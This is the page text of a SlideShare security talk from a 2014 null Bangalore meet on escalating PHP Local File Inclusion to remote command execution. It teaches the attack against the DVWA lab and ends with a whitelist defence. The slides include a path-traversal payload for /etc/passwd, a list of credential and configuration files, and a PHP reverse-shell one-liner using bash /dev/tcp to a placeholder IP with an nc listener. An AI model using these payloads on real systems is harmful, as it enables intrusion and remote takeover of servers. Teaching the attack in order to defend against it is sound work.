• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Local File Inclusion to Remote Code Execution
 

Local File Inclusion to Remote Code Execution

on

  • 493 views

null Bangalore Chapter - March 2014 Meet

null Bangalore Chapter - March 2014 Meet

Statistics

Views

Total Views
493
Views on SlideShare
345
Embed Views
148

Actions

Likes
0
Downloads
12
Comments
0

2 Embeds 148

http://null.co.in 146
http://www.slideee.com 2

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Local File Inclusion to Remote Code Execution Local File Inclusion to Remote Code Execution Presentation Transcript

    • Local File Inclusion To Remote Command Execution [LFI <> RCE] By Sharath Unni
    • Introduction  What is a file inclusion vulnerability?  How the attack works?  RFI/LFI vulnerable PHP functions  Traverse and read local files  PathTraversal / FI using scanners  Reverse shell via LFI  Other ways to inject your code  Defending yourself
    • What is a file inclusion vulnerability?  Input validation  The application trusts/doesn’t validate the user input  The code includes/imports other pages  Dynamic including of the page  When PHP includes a file it will parse any PHP code within that file (“<?php” and “?>”) Do not trust the user…ever !!
    • How the attack works? http://192.168.109.136/dvwa/vulnerabilities/fi/?page=include The code would be: <?php $file =$_GET[‘file']; include("/".$file .".php"); <--Vulnerable !! ?>  Assign page to "../../../../etc/passwd%00“ <?php $file =$_GET[‘file']; include("/../../../../etc/passwd%00.php"); <-- Directory Traversal to LFI ?> %00 (Null CHAR) will ignore everything that comes after %00 ../../../ will traverse path to root and goto /etc/passwd
    • RFI/LFI vulnerable PHP functions include() include_once() require() require_once() fopen()
    • Common locations  Normally, the following files are read: /etc/passwd /etc/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/httpd/conf/httpd.conf  Other Unix common locations
    • Path Traversal / FI using scanners http://sectooladdict.blogspot.in/ OR http://sectoolmarket.com/
    • We read the files, what next?
    • Reverse shell via LFI  PHP script to open an outbound TCP connection <?php exec("bash -i >& /dev/tcp/<yourIP>/<port> 0>&1"); ?>  Go and catch the reverse shell nc –lp <port>
    • Other ways to inject your code  Using directory traversal to read files  Log poisoning (access.log, error.log)  Session variables  Uploaded files  Emails  Shared hosting  FTP and other logs
    • Defending yourself  <?php  $page_files=array( 'about'=>'about.html',  'photos'=>'photos.html',  'contact'=>'contact.html',  'home'=>'home.html'  );   if (in_array($_GET['page'],array_keys($page_files))) {  include $page_files[$_GET['page']];  } else {  include $page_files['home'];  }  ?>
    • Thank You! 
    • References  http://sectoolmarket.com/path-traversal-local-file- inclusion-detection-accuracy-of-open-source-web- application-scanners.html